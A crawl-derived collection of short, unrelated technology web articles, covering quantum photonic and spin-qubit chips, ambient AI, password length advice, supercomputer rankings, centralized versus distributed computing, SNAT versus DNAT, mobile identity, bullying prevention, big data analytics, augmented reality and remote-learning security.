that your data gets where it needs to go as quickly as possible. | <urn:uuid:4e1ee25d-443e-4aee-aca0-c5d3dc2eb07a> | CC-MAIN-2022-40 | https://mcpmag.com/articles/2002/04/01/your-networks-traffic-cops.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335350.36/warc/CC-MAIN-20220929100506-20220929130506-00488.warc.gz | en | 0.933986 | 4,648 | 2.859375 | 3 |
Photonic chip that isolates light could end size limitations in quantum computing and devices
(NSF.gov) Researchers at the University of Illinois used readily available materials to create a small photonic circuit that uses sound waves to isolate and control light and can adapt to different wavelengths. The innovation could lead to miniaturized quantum devices that transform quantum computing and information systems.
Transmitting data by manipulating photons — particles of light — that travel at the speed of light using quantum devices is how information reaches around the globe almost instantly. The new breakthrough makes quantum technology more functional and portable. The researchers, funded in part by the U.S. National Science Foundation, published a paper detailing their results in Nature Photonics.
Using common optical materials, the team developed a non-magnetic isolator that is a fraction of the size of conventional isolators. The chip-sized isolator can isolate and control the direction of light and eliminate the adverse impact of unblocked light on device performance. The design is an answer to the scale and utility issues of conventional quantum technology, the scientists said.
Miniaturizing quantum computing devices is critical to realizing the full potential of quantum technology, the researchers said. Developing quantum technology devices with applications that are scalable and practical will advance quantum computing, information systems and applications.
“An isolator is a device that allows light to pass uninterrupted one way and blocks it completely in the opposite direction,” said study author Benjamin Sohn. “This unidirectionality cannot be achieved using common dielectric materials or glasses, so we needed to be a little more innovative.” | <urn:uuid:15e6a744-0ab9-46e0-be23-5502aee84a74> | CC-MAIN-2022-40 | https://www.insidequantumtechnology.com/news-archive/photonic-chip-that-isolates-light-could-end-size-limitations-in-quantum-computing-and-devices/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337244.17/warc/CC-MAIN-20221002021540-20221002051540-00488.warc.gz | en | 0.900319 | 330 | 3.265625 | 3 |
Welcome to the future of IoT and perceptive intelligence, where user interaction is optional and contextual awareness is machine learning enabled.
Human interface that connects us with machines — the way we interact and control them — has changed a lot over the years. From tactile methods like knobs, buttons, keyboards, pads and touch screens to more recent voice and visual command capabilities, we’ve adapted our devices to become more user-friendly and more humanlike by using more intuitive input techniques. We’ve all grown accustomed to the swipe, the pinch, the “Hey, Google,” and the hand gesture to tell our devices what to do. But they still require the human element, a proactive direction by a person. That, too, is changing.
A new generation — indeed, ecosystem — of devices, will be driven by interfaces that perceive your wants and needs. Welcome to the future of IoT and perceptive intelligence, where user interaction is optional and contextual awareness is machine learning enabled. When devices transition from collecting and transferring information to using that information intelligently on their own, computing has become ambient.
Although based on some level of human interaction, ambient computing doesn’t require active participation. Artificial intelligence and deep learning can now power entire integrated ecosystems of devices to learn about users, their environments and their preferences, and then adjust accordingly to provide the optimal response or action. This kind of perceptive intelligence is enabled by sensors and vision and is embedded in our living and working spaces in a way that allows its use without being fully aware that we are doing so.
This level of intelligence is a result of the progression of AI and machine learning to deep neural networks that change the paradigm from sensing to perception and, ultimately, recognition of intent. Recent breakthroughs in deep learning are creating a revolution in the application of AI-to-speech recognition, visual object recognition and object detection. The connected devices provide the data and the AI learns from that data to perform certain tasks without human intervention.
Best of all, perceptive intelligence doesn’t even require a connection to the internet. Edge-based processing now has the performance and accuracy required (as well as the energy efficiency and small form factors to fit in battery-powered consumer products) to run sophisticated AI and machine learning algorithms locally, sparing users the cost, bandwidth, latency and privacy challenges of a cloud-based model. Now, devices can collect and analyze video and audio data and respond intelligently in near real time — without the risk of compromising user privacy or security or the cost of transmitting literally zettabytes of data to the cloud-based data centers. […] | <urn:uuid:ce890da1-d10d-43df-bc87-97bde46ef28e> | CC-MAIN-2022-40 | https://swisscognitive.ch/2020/05/23/neural-networks-and-machine-learning-are-powering-a-new-era-of-perceptive-intelligence/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337415.12/warc/CC-MAIN-20221003101805-20221003131805-00488.warc.gz | en | 0.92816 | 532 | 2.625 | 3 |
It seems like every platform has different requirements for passwords.
And the complexity can make it somewhat of a mess when it comes to remembering how to access accounts.
One requirement, however, is pretty consistent: The password needs to be a certain number of characters. The current recommendation from the National Instituate of Standards and Technology (NIST) is a minimum of eight characters.
Essent Systems Integration Manager Damon Kopp recently led a company training session on passwords and provided some interesting insights along the way — including why eight characters is the standard. Here is some of what we learned.
Passwords Are Ancient
Passwords were used at least as early as the Roman military.
Passwords pre-date the internet, computers, and even electricity. Some light etymological research reveals passwords were used at least as early as the Roman military.
Literally, a password is a word that allows you to pass into a certain area, and it's clear to see how that would be of use in military situations. Passwords are also defined as words that distinguish between friend and foe.
Billions Of Email Addresses Are Compromised
A lot of password breaches are minor, like getting your email scraped onto a marketing list. But many are not.
Almost 6.5 billion email accounts have been compromised in some way, according to web security expert and author Troy Hunt. Hunt runs a website where you can check if your email address has ever been compromised.
A lot of these are minor, like a bot scraping your email address to make a marketing list. But a lot of them are not, especially if the breech includes a password or if the password attached to your email account is not strong.
Don’t Double-Dip Your Passwords
We know — it’s basically impossible to remember your passwords now even without individualizing for every site. But there are tools and stratgies.
It’s a risk to use one password for more than one platform because if someone cracks your password on one platform, now they have your password for multiple platforms.
We know, we know — it’s basically impossible to remember your passwords now even without individualizing for every site. But there are strategies and tools that make it easier.
One strategy is to use a prefix or suffix for each platform. For example, if your regular password is 12345 (we hope not!) then your email password might be 12345-mailbox or your fantasy sports login might be pigskin-12345.
Additionally, LastPass, owned by the GoToMeeting maker Citrix, is a tool for password management. It stores all of your passwords behind one master password, so that you only need to remember the one master password (better make that one password a doozy though!).
You Have To Be A Liar Sometimes
Don’t set up your challenge questions truthfully!
How hard would it be for someone to Google your high school’s mascot?
Challenge questions are those like "What is your mother’s maiden name?” or "What was your high school mascot?” that platforms often ask when you’re trying to reset your password.
Trouble is, the truthful answers to many of those questions are often easy for others to find out. Your social media profile probably already says or infers where you went to high school — how hard would it be for someone to Google your high school’s mascot?
When you’re setting up your account, you’d be safer making up a fake school or saying your friend’s school. The answers to challenge questions shouldn't actually be the correct answer to the question.
Eight Characters Is Just The Start
Hackers use "brute force” algorithms that generate thousands of password guesses per second. The longer the password, the more computing power it takes to generate the right guess.
And now finally back to password length. Why require eight characters?
Hackers run algorithms that try to "brute force” their way into the right password by continuously generating random passwords.
But it takes a certain amount of computer power to continuously generate passwords — we're talking thousands per second. And so every extra character in the password requires exponentially more computer power to crack.
With computer power increasing all the time, the minimum required password length is a moving target that's only going to go up. But for today’s computing power, eight is the minimum number of characters that the NIST recommends.
One of our colleagues in the session drew a chuckle when he asked how long passwords will need to be when quantum computing becomes more widely available.
The bottom line is get ready for longer passwords. The National Institute of Standards and Technology is already recommending passwords as long as 64 characters.
Essent is the leading provider of fully-integrated business management software solutions and services for process-intensive industries and the largest trading network for the promotional products industry. The Essent family of fully-integrated products and services combines best practices, business processes, software automation, and network communications to deliver unparalleled, unified business management solutions. Since 1980, Essent has offered the systems, service, software, and support critical to success in today's highly-competitive marketplace. | <urn:uuid:1e364805-346e-41b0-a6b5-d57778c9fe17> | CC-MAIN-2022-40 | https://www.essent.com/CompanyCulture/Blog/Why-Do-Passwords-Need-At-Least-8-Characters.htm?1003931pageno=2 | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337415.12/warc/CC-MAIN-20221003101805-20221003131805-00488.warc.gz | en | 0.940986 | 1,091 | 3.171875 | 3 |
If supercomputing was a game, there would be two winners at present: China and Linux. In the latest biannually released Top500 list of the world's fastest supercomputers, China not only has the world's fastest supercomputer, it has now passed the US as the country with the most supercomputers, while Linux has reached the milestone of becoming the operating system running all supercomputers on the list.
In June, when the last list was released, the US had the most supercomputers with 169, followed by China with 160. On the new list, China counts 202, with the US in second place with 143. This represents the highest number ever for China and the lowest for the US.
China also passed the US in aggregate performance, with 35.4 percent of the TOP500 flops. The puts the US in second place with 29.6 percent.
Although supercomputers aren't on the public radar as much as conventional computers, they play an important role in areas such as quantum mechanics, national defense, weapon design, weather forecasting, oil and gas exploration, and climate research. Since being introduced in the 1960s, the US has dominated the field, until now.
China already had the fastest supercomputer in the world, Sunway TaihuLight, developed by the country’s National Research Center of Parallel Computer Engineering and Technology. It remains number-one, weighing in with a High Performance Linpack (HPL) mark of 93.01 petaflops. In case you're wondering, a petaflop is a quadrillion floating-point operations per second.
Here are the five fastest supercomputers in the world, according to the latest edition of Top500:
The second fastest system, which also belongs to the Chinese, doesn't even come close to the winner, running at 33.86 petaflops. That's Tianhe-2 (Milky Way-2), a system developed by China’s National University of Defense Technology.
The largest system in the US is a five-year-old Cray XK7 system called Titan that ranks fifth at 17.59 petaflops. Titan is installed at the Department of Energy’s Oak Ridge National Laboratory and until July had been the third highest performing supercomputer on the planet.
Six months ago Titan was knocked down a peg after the Swiss upgraded Piz Daint, a Cray XC50 system located in Lugano, Switzerland. On the new list it went down again, due to an upgrade of Gyoukou, a ZettaScaler-2.2 system deployed at Japan’s Agency for Marine-Earth Science and Technology which clocks at 19.14 petaflops and employs a record high 19,860,000 cores.
China added another feather to its supercomputing cap with an announcement on Thursday that the Association for Computing Machinery (ACM), the world's largest scientific and educational computing society, has given a 12-member Chinese team the 2017 ACM Gordon Bell Prize. The prize has been awarded each year since 1987 to recognize outstanding achievement in high-performance computing applications and includes a cash reward that since 2011 has been set at $10,000.
This year's prize winners were responsible for a project involving Sunway TaihuLight, in which they developed software that processed 18.9 Pflops of data to create 3D visualizations related to a major earthquake that occurred in Tangshan, China, in 1976. The team’s software included innovations that achieved greater efficiency than had been previously attained running similar programs on the Titan and TaihuLight supercomputers.
With this week's Top500 list we also witness the last two supercomputers not running Linux (both were Chinese systems running IBM's AIX) dropping away to make Linux the only operating system being used on any top 500 system. Linux first entered the Top500 list in 1998, five years after the list began, and surpassed Unix as the most used OS in 2004. Now it's the last man standing.
Of the 10 fastest supercomputers in the world, four are located in the US, three in Japan, two in China and one in Switzerland. | <urn:uuid:17b13cfe-b4cc-4214-acdf-54f4caf3d6d0> | CC-MAIN-2022-40 | https://www.datacenterknowledge.com/supercomputers/china-and-linux-dominate-supercomputing | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337723.23/warc/CC-MAIN-20221006025949-20221006055949-00488.warc.gz | en | 0.963935 | 867 | 2.828125 | 3 |
One question tech experts are asking themselves constantly is, “How is the computer/computation/server industry going to move forward?” Technology experts are trying to figure out what direction the computer industry is going to move in, and one key indicator of how the industry will move forward is by looking at history.
What Is Centralized Computing?
Originally, computers were all centralized due to the fact that there weren’t separate terminals for each computer – meaning they took up large chunks of space and were expensive to make. Everything was built in.
More individuals wanted to use a computer to solve complex problems and simplify their daily routine through the use of new technology, and it was clear that things needed to change moving forward. It was this realization that gave birth to centralized computing through the use of individual terminals.
Centralized computing was created to allow more individuals to gain access to a computer and focuses on scaling the technology for more people to use it. Essentially, a computer is a standalone device. You give the computer an input, it processes that input, and it will deliver some output.
Essentially, centralized computing is in every device we use throughout our normal routine – our personal computer, cellphone, or tablet work device.
In this way, every person has access to a computer, but the computational power is limited on the hardware technology within the product, and is built with economic scale in mind. The more affordable the product is, the greater number of individuals who can purchase that product. The more people who have access to a computer, the more complex problems can be solved over time.
As prices decrease, computational power decreases as well, due to the fact that innovative technology is expensive. This means that if you need to use complex calculations for large scale problems, and need to find a solution – centralized computing has its significant limitations on producing efficient results.
While it might be possible for a centralized computer to develop a solution to the proposed problem, it will take an immense amount of time.
For instance, if you are doing a research project and you need to have a computer solve an extremely complex algorithm, your single PC might not have enough processing power to come up with a solution in a reasonable timeframe, or come up with a solution at all.
Think about centralized computing like this: You have 1 problem, and you only have one computer to solve the issue.
It was this exact limitation that led to the development of Distributed Computing.
What Is Distributed Computing?
While a single personal computer might not have enough processing power to solve complex problems, distributed computers can assist with ease. Distributed Computing is essentially taking a large complex task, and splitting it up into pieces that can be solved on their own by other computers.
For instance, if you have a complex video that requires high-end graphics settings, or needs to model a 3D element, it would be more efficient and faster to split up chunks of that project to different computers and render the element in half the time. You are effectively distributing the workload across multiple platforms.
Think about distributed computing like this: You have 1 problem, and you can solve the problem through the use of five separate computers. Essentially, each computer only has to solve 1/5th of the problem, as they are all working in conjunction with one another, and can provide a solution in 1/5th the amount of time required.
Why Is Centralized Or Distributed Computing Important?
Now that you understand what each of the two different types of computing is, it’s important to understand why knowing the difference between each one is important. While it’s true that we have more computing power in our mobile phones than the computing power it took to land on the moon, that doesn’t mean that we should be satisfied.
Even though we have more computing power in our mobile phones to solve complex algorithms or equations, it doesn’t mean that the level of difficulty with problems or complex tasks remained the same. In fact, it’s the complete opposite.
We need to continually invest in new computing technology to meet the demands of the future. As we develop new software and technology, we need quicker computers with more processing power to solve more problems, at a faster rate.
This means that moving forward, technology experts need to come up with new and innovative solutions to solve the complex problems of the future – and we need to evaluate whether or not those complex algorithms and problems will be solved through centralized computers, or distributed computers.
How Is Distributed Computing Being Used?
One unique thing about distributed computing is that complex computations can be solved through a server network, or through various network connections. If an organization or business has several computers all linked to the same network or server settings, then they can theoretically access all the data on a central network.
This means that complex problems and tasks can all be solved at once towards completion of one solution, without additional hassle.
In addition, there has been a recent push for crowdsourced distributed computing solutions. For instance, one company like Golem is enabling users to share a piece of their computing power to a central network while earning cryptocurrency. From there, other users can use that processing power network for their own computational needs.
Essentially, this new technology allows companies or individuals to lease additional computing power off the backs of other contributors to the central server network.
Participating in these new endeavors are much more cost-effective than building additional computers, servers, or networks on their own – as you can lease existing technology from other providers of the same network.
Will Computers Be Centralized or Distributed Moving Forward?
The key question to answer is how computers will solve complex problems in the future. Will computers solve problems through centralized methods, or will they be distributed moving forward? There are plenty of concerns associated with each method of computations.
With centralized computing, there is a substantial amount of concern associated with escalating costs for more processing power, and efficiency of existing measures.
While it is entirely possible for problems to be solved through a centralized computer, prices for additional computer processing power will continually rise and limit the amount of exposure to the technology for those individuals and businesses who can’t afford the steep prices.
Distributed computing also has its various limitations as well. If you have one complex problem that has one large step, there are limitations as to how you could split up the computations to various computers.
This means that while you can split up problems to be solved by other computers within the distributed computer network, there will still be a substantial bottleneck until the largest piece is completed.
In other words, while it might sound more efficient overall to split a task into multiple parts – there are limitations that need to be evaluated for each complex problem. Even though new technologies are being developed to allow individuals to access or lease others’ computing power, the entire premise of those technologies are based on a willingness from the network members.
This means that if those networks don’t have enough members, or members aren’t willing to participate – the technology isn’t useful or efficient.
To truly answer the question of whether or not computers will be centralized or distributed moving forward, each problem has to be evaluated in terms of efficiency.
Which Computing Method Is More Efficient?
Solving complex problems through the use of centralized computing methods or distributed computing methods comes down to overall efficiency for each problem that needs to be solved. Centralized computers can solve complex solutions, but are expensive when implementing new technology, and slower due to the fact that all solutions must be solved through one device.
Distributed computers don’t need to have the most advanced technology, can solve problems in different parts, are more cost-effective, but do have their unique drawbacks. Distributed computers can only process and solve problems based upon the individual computer’s processing power.
This creates limitations of efficiency for each unique computer – which can lead to potential bottlenecks in various parts of the entire solution. In addition, in the event that one of the decentralized computers fails to solve a solution, or is no longer in operation – the rest of the network must pick up the slack.
What Do You Think Computers Will Look Like In The Future?
What do you believe computers will look like in the future? Do you think everyone will adopt a standard of sharing their PC’s computing power to solve more complex problems through a distributed computing network, or will more advancement be made to allow more computing power in a centralized platform? | <urn:uuid:6f6dca2d-386e-4a36-aa9e-ee0647658cbe> | CC-MAIN-2022-40 | https://www.datacenters.com/news/will-computers-be-centralized-or-distributed | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337723.23/warc/CC-MAIN-20221006025949-20221006055949-00488.warc.gz | en | 0.950487 | 1,748 | 3.34375 | 3 |
Intel has developed a silicon-based quantum computing chip that can be manufactured using conventional foundry techniques.
The ‘spin qubit processor’ is made with isotopically pure silicon wafers, and uses magnetic resonance to manipulate individual electrons.
The theory behind this approach has been known for a while (detailed maths here), but the company is the first to make it ready for mass production.
Intel says spin qubit machines could help overcome some of the scientific hurdles to take quantum computing from research to reality.
A different way
Quantum computers can carry out calculations using quantum bits or qubits. Because quantum states can be superposed, qubits can measure both 1 and 0 simultaneously – just as the famous cat in Schrodinger’s Paradox can be both alive and dead because it is isolated from the outside world in a coherent quantum state.
Quantum computers could help solve certain problems much faster than conventional machines – list of potential applications includes medical research, machine learning, financial modeling and even weather forecasting.
Intel’s latest quantum computing chip is the result of a collaborative research project launched back in 2015. It focuses on spin qubits, since they are much smaller in physical size and don’t require extremely cold temperatures like ‘superconducting’ qubits used in most universal quantum computer prototypes. Intel is actually working on both approaches, but says spin qubits are less fragile, so their coherence time is expected to be longer.
Here’s how the company explains it:
Electrons can spin in different directions. When the electron spins up, the data signifies the binary value 1. When the electron spins down, the data signifies the binary value 0. But, similar to how superconducting qubits operate, these electrons can also exist in a “superposition,” which means they have the probability of a spin that’s up and down at the same time and, in doing so, they can theoretically process tremendous sets of data in parallel, much faster than a classical computer.
The technology has enabled Intel’s academic partner, QuTech research center at the Delft University of Technology in the Netherlands, to create a two-qubit quantum computer that can be programmed to perform two simple quantum algorithms.
Meanwhile Intel invented the manufacturing process, using isotopically pure wafers sourced specifically for the production of spin-qubit test chips, but the same lithography equipment that is used to make Xeon CPUs. The company said that in a couple of months, it will be able to produce “many wafers per week, each with thousands of small qubit arrays.”
At the same time, Intel acknowledged that there are many more problems to be solved and many more architectural decisions to be made before quantum computing makes practical sense.
Intel it’s not alone in this space: last year, IBM used superconducting circuits to build a 20-quibit machine available for commercial use, and promised a 50-qubit quantum computer ‘in the next few years.’ | <urn:uuid:15b63d91-e95d-4394-bca2-da22776c7208> | CC-MAIN-2022-40 | https://www.datacenterdynamics.com/en/news/intel-reveals-silicon-based-quantum-processor-prototype/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338073.68/warc/CC-MAIN-20221007112411-20221007142411-00488.warc.gz | en | 0.920892 | 632 | 3.671875 | 4 |
Hi viewers, in this post we will walk through detailed comparison of SNAT vs DNAT and when/where are they required in the network. While in case of SNAT, the destination IP address is saved not manipulated and the source IP address is changed. On the other hand, in case of DNAT, destination address is changed and the source IP address is not manipulated. But before we continue in detail, let’s understand NAT, SNAT and DNAT terminologies –
NAT is an abbreviation for Network Address Translation. NAT occurs when one of the IP addresses in an IP packet header is changed i.e. either Source IP address or Destination IP address.
SNAT is an abbreviation for Source Network Address Translation. It is typically used when an internal/private host needs to initiate a connection to an external/public host. The device performing NAT changes the private IP address of the source host to public IP address. It may also change the source port in the TCP/UDP headers.
A typical scenario where we generally use SNAT is when we are required to change the private (i.e. RFC1918) address or port into a public address or port when the packets are leaving the network. In terms of order of operation on NAT device, SNAT feature comes to fore after the routing decision has been made. Moreover, when there are multiple hosts on the “inside” network who want to get to any host on the “outside” network, SNAT is used.
DNAT stands for Destination Network Address Translation. Destination NAT changes the destination address in the IP header of a packet.
It may also change the destination port in the TCP/UDP headers. The typical usage of this is to redirect incoming packets with a destination of a public address/port to a private IP address/port inside your network.
Destination NAT is performed on incoming packets, where the firewall translates a public destination address to a private address. DNAT is a 1-to-1, static translation with the option to perform port forwarding or port translation.
Users over Internet Accessing a Web Server hosted in a Data Center is a typical example where DNAT is used to hide the private Address of Web Server and NAT device translates the Public Destination IP reachable to Internet Users to Private IP address of Web Server.
SNAT vs DNAT –
|Abbreviation for||Source NAT||Destination NAT
|Terminology||SNAT changes the private IP address of the source host to public IP address. It may also change the source port in the TCP/UDP headers. SNAT is typically used by internal users to access the Internet.||Destination NAT changes the destination address in IP header of a packet. It may also change the destination port in the TCP/UDP headers. DNAT is used when we need to redirect incoming packets with a destination of a public address/port to a private IP address/port inside your network.
|Use Case||A client Inside LAN and behind Firewall wanted to browse Internet||A Website Hosted inside Data Center behind the Firewall and needs to be accessible to users over Internet
|Address Change||SNAT changes the source address of packets passing through NAT device||DNAT changes the destination address of packets passing through the Router
|Order of Operation||SNAT is performed after the routing decision is made.||DNAT is performed before the routing decision is made.
|Communication Flow||When inside secured Network initiates communicates with outside world , SNAT happens||When outside insecured Network initiates communication with inside secured Network , DNAT happens
|Single/Multiple hosts||SNAT allows multiple hosts on the “inside” network to get to any host on the “outside” network||DNAT allows any host on the “outside” network to get to a single host on the “inside” network
Download the differnce table here.
If you want to learn more about NAT, then check our easy to understand Free NAT Cheatsheet in downloadable PDF Format explained with relevant Diagrams. | <urn:uuid:e5eee8a6-7a49-4052-bd7f-a804edb35172> | CC-MAIN-2022-40 | https://ipwithease.com/snat-vs-dnat/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334942.88/warc/CC-MAIN-20220926211042-20220927001042-00688.warc.gz | en | 0.900691 | 880 | 3.40625 | 3 |
What is mobile identity?
Mobile identity is a relatively new, broad concept referring to the way that our connected devices can be tied to us as individuals. A smartphone, for example, can be linked to an end user through a saved biometric template that allows only the authorized user to access it with a fingerprint scan or a selfie. But with new developments in FinTech, the Internet of Things, and even connected cars, mobile identity technologies are playing an increasingly important role across a range of devices and form factors, from fitness-tracking wristbands to in-car AI assistants that can recognize the driver’s voice.
Why is biometric technology becoming so popular on mobile devices?
To put it simply, biometric technology offers stronger and more convenient security than previous authentication methods. Passwords and PINs can both be compromised or forgotten, and must be changed on a regular basis. Since consumers are using their smartphones to access their many digital accounts, having a single strong authentication factor presents an attractive level of convenience while improving security. Because a biometric system is based around who a user is and not what they know or have, it is more intuitive to use than a password – especially considering that the username/password system in place was developed for devices with a QWERTY keyboard – and much more difficult to compromise. Thanks to recent innovations, biometric solutions are becoming increasingly accessible, while recent high-profile security breaches have underlined a need for better-than-password technology.
What other security technologies support mobile identity?
There are a number of solutions and mechanisms that are being used to secure identity across today’s mobile devices. There are security keys, for example, that can be plugged into the USB port of a laptop or tapped against an NFC-enabled mobile device in order to prove the end user’s physical presence during authentication. One Time Passwords, meanwhile, are increasingly being transmitted to end users’ mobile devices, allowing them to verify that they have a registered device at hand. Other important security mechanisms used in mobile identity include encryption, cryptographic hashing, trust certificates, embedded Secure Elements, and more.
How do second factors work in comparison to biometrics?
While a biometric is something you are, a second factor is something you have. The latter is often used in conjunction with something you know (a password or PIN), enhancing the traditional security framework; but it’s increasingly being used together with biometrics to enable even stronger security. Common second factors include tokens that generate a One Time Password (OTP), a mobile device with GPS (location based factors), and USB or NFC security keys, with models now emerging that feature embedded fingerprint sensors.
What is the role of AI in mobile identity?
Artificial Intelligence is playing an increasingly critical role in helping to support and secure mobile identity. The threat of presentation attacks – or “spoofing” attacks – aimed at tricking biometric authentication systems has prompted vendors to implement sophisticated, AI-driven liveness detection systems that look for subtle cues signalling that a live, human user is the one authenticating. And even before liveness detection comes into play, many of today’s biometric authentication systems already operate on the basis of AI-driven computer vision based on machine learning.
AI is also increasingly being used to automatically detect the signs of fraud in online behavior in the form of typing patterns, for example, or the speed at which online forms are filled out, among other anomalies. State-of-the-art AI can not only identify known end users, but also recognize the signs that something isn’t right, prompting step-up authentication requests and other additional security mechanisms.
How does mobile identity fit into the Internet of Things?
The Internet of Things is blossoming across the consumer, enterprise, and industrial markets. As the IoT grows and proliferates into all areas of society, mobile identity solutions offer two major benefits:
1. Mobile ID solutions can help end users interface with smart devices, either from an experience standpoint (the device senses your unique ID and reacts accordingly) or an administrative perspective (using voiceprint and speech recognition to change the settings on a connected device).
2. Mobile ID solutions can offer much needed, network-wide security. As more devices connect through the Internet of Things, experts are scrambling to find strong security solutions that can protect interconnected networks from sophisticated cyber threats, and mobile identity helps to ensure that end user touchpoints are secure.
How can mobile identity technology be used in commerce and payments?
Mobile identity technologies like smartphone fingerprint scanners and selfie authentication are now being used to authorize payments through mobile devices, even in brick-and-mortar retail stores. And beyond securing mobile payments and digital wallets, these same kinds of mobile identity technologies are increasingly finding their way into new applications, from biometric payment cards to in-car payment systems that let drivers get gas and pay tolls without getting out of the car.
What is on-device authentication?
On-device biometric matching is common across biometrics-enabled smartphones and a growing number of other devices. In this framework, biometric templates are stored in a secure place on the mobile device that can only be accessed by the authentication technology. Data is not transmitted to external servers; instead, the entire authentication process plays out within the device itself. While this limits the means by which an end user can authenticate – they must use the device on which they have been registered – it prevents the server-side hack attacks and data breaches that so often compromise personal data.
What standards and regulations apply to mobile identity?
There’s an increasingly complex web of standards and regulatory guidelines applicable to mobile identity technologies. In terms of industry standards aimed at promoting technological advancement, the FIDO Alliance has emerged as an important cross-industry body issuing specifications for two factor authentication (2FA) and multi-factor authentication (MFA), with a focus on the on-device approach.
On the regulatory side, laws like the European Union’s PSD2 and GDPR, aimed at securing online payments data and privacy, are pushing a growing number of businesses and other organizations to implement mobile identity technologies enabling Strong Customer Authentication. | <urn:uuid:2bdd2eee-05d0-446b-b4fd-756c97af3174> | CC-MAIN-2022-40 | https://mobileidworld.com/faq/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335355.2/warc/CC-MAIN-20220929131813-20220929161813-00688.warc.gz | en | 0.925368 | 1,268 | 2.625 | 3 |
Baking a cake and preventing bullying have more in common than you may think.
If you were going to bake a cake, you would start by finding your favorite cake recipe (and there are hundreds of them to choose from). Based on how serious you are about making a great cake, you can choose a simple recipe or a more complex recipe.
Similarly, if you were going to prevent bullying, most schools start by finding their favorite bully prevention “recipe /program” (and there are hundreds of them to choose from). Based on how serious you are about preventing bullying, you can choose a simple program or a more comprehensive program.
You can find “recipes / programs” in books. You can buy “recipes / programs” online. You can even listen to your favorite expert and purchase their “best recipe / program”.
But just finding/buying your favorite “recipe” for baking a cake or preventing bullying does not mean you instantly have a cake or a safe learning environment.
To bake a cake you need to get all the right ingredients and the right tools to measure the right amounts and mix them together in the right order and bake the cake at the right temperature for the right amount of time… and then you need the right frosting to create a great cake.
To prevent bullying you need all the right ingredients and the right tools to measure awareness, accountability and share all the right information with the right people in the right places at the right time…so the right people can do the right things and prevent preventable incidents like bullying (as well as cyber bullying, suicides, mass shootings, drugs, alcohol, child abuse, sex abuse, depression, etc.) and create a safer and more positive learning environment.
To find out if your school has all the right tools and ingredients to build a safer and more positive learning environment, schedule a free 30 minute consultation at firstname.lastname@example.org. | <urn:uuid:5441bc10-1bbe-4916-ab53-f5bddeea2b20> | CC-MAIN-2022-40 | https://www.awareity.com/2013/05/14/preventing-bullying-like-baking-a-cake/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337287.87/warc/CC-MAIN-20221002052710-20221002082710-00688.warc.gz | en | 0.938368 | 402 | 3.171875 | 3 |
Big data analytics provides enterprises with a range of new insights into how they should operate their businesses. While taking full advantage of this emerging practice is difficult, many organizations are using it extensively, pressuring competitors to keep pace. Understanding the technology available and how it is being used can help organizations use big data analytics to meet their own business goals.
Over the past few years, the scale, speed, and power of analytics have been dramatically transformed. The amount of data available from the internet, combined with advances in software to make use of it, has created a practice called "big data analytics." It can provide types of information that were not available in the recent past and it has the potential to do so in real time.
The advent of big data analytics has created new challenges for executives. There are new types of data to be understood and incorporated into strategic planning. Making big data analytics work is not simply a technical task but an executive strategy-setting activity. Some core business practices in certain industries could be transformed in the coming years.
The use of big data analytics is still maturing, but it is already common. Major vendors such as Cisco, Google, and IBM offer solutions and services in the market. But the many elements of the process—from gathering data to spotting patterns to translating raw findings into actionable information—are rarely provided by a single solution. Instead, enterprises must build their own systems, using an understanding of their business goals as a guiding factor.
The Evolution of Analytics
Using software to analyze data is an old practice. Analytics have been employed for purposes as diverse as predicting the weather to determining what line of business a company should enter. Starting a few years ago, the practice began undergoing what has been called a revolution. The use of the Internet has greatly expanded the volume and breadth of data available, and many diverse tools to crunch the data have been created. The difference is not simply that analytics have become better, but that they are fundamentally different. This new discipline is Big Data analytics. Describing this change as it began to fully emerge, a 2012 Harvard Business Review assessment of the development offered the following example: "Booksellers in physical stores could always track which books sold and which did not. If they had a loyalty program, they could tie some of those purchases to individual customers. And that was about it. | <urn:uuid:1aa1c8c4-7a5a-4415-8f4d-10024a1818c2> | CC-MAIN-2022-40 | https://www.dbta.com/Editorial/Trends-and-Applications/What-is-Big-Data-Analytics-121787.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337287.87/warc/CC-MAIN-20221002052710-20221002082710-00688.warc.gz | en | 0.966801 | 472 | 2.796875 | 3 |
Augmented reality (AR) leverages graphic images to overlay on top of a physical environment. These images, such as repair instructions, can be viewed in relation to a picture or a live video view of an environment, such as an engine bay in a car. Some applications of AR require specific hardware, such as Microsoft HoloLens.
Many people have viewed augmented reality images in sports for years, perhaps without realizing it: from AR lines drawn on a football field to indicate the next down line, to moving lines drawn across swimming pools to superimpose the pace of a record-pace, to tracing the paths of basketballs, baseballs, and tennis balls during play.
AR has many use cases in the enterprise, such as being used in repair or assembly instructions, or immersive training scenarios. Because AR can be leveraged by many users at the same time, new use cases will continue to emerge. | <urn:uuid:ad5b9971-5ff6-493c-8481-7fe9215f93ec> | CC-MAIN-2022-40 | https://aragonresearch.com/glossary-augmented-reality/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337421.33/warc/CC-MAIN-20221003133425-20221003163425-00688.warc.gz | en | 0.956149 | 183 | 2.734375 | 3 |
Prioritizing Security in a Remote Learning Environment
Learning environments are not what they used to be, and as educational institutions deploy new technology to facilitate a safe and effective remote learning environment, their cyber vulnerabilities also increase. Canadian schools especially have seen a rise in ransomware attacks with the transition to online learning, opening the door for hackers to exploit student data and sabotage academic research. To combat the rising cybersecurity concerns, educators need to implement new measures to uphold secure and efficient distance learning environments without allowing student data and privacy to hang in the balance.
Why Education Has a Target on Its Back
Limiting disruptions remains a high priority for educators as they discover how to manage their remote classrooms. Although many teachers are familiar with supplemental technologies such as tablets and online programs, it’s another matter entirely to be completely dependent on them to support a fully virtual classroom. When investing in online learning tools, educational institutions should not allow their concern for efficiency to overshadow an equally important requirement: safety.
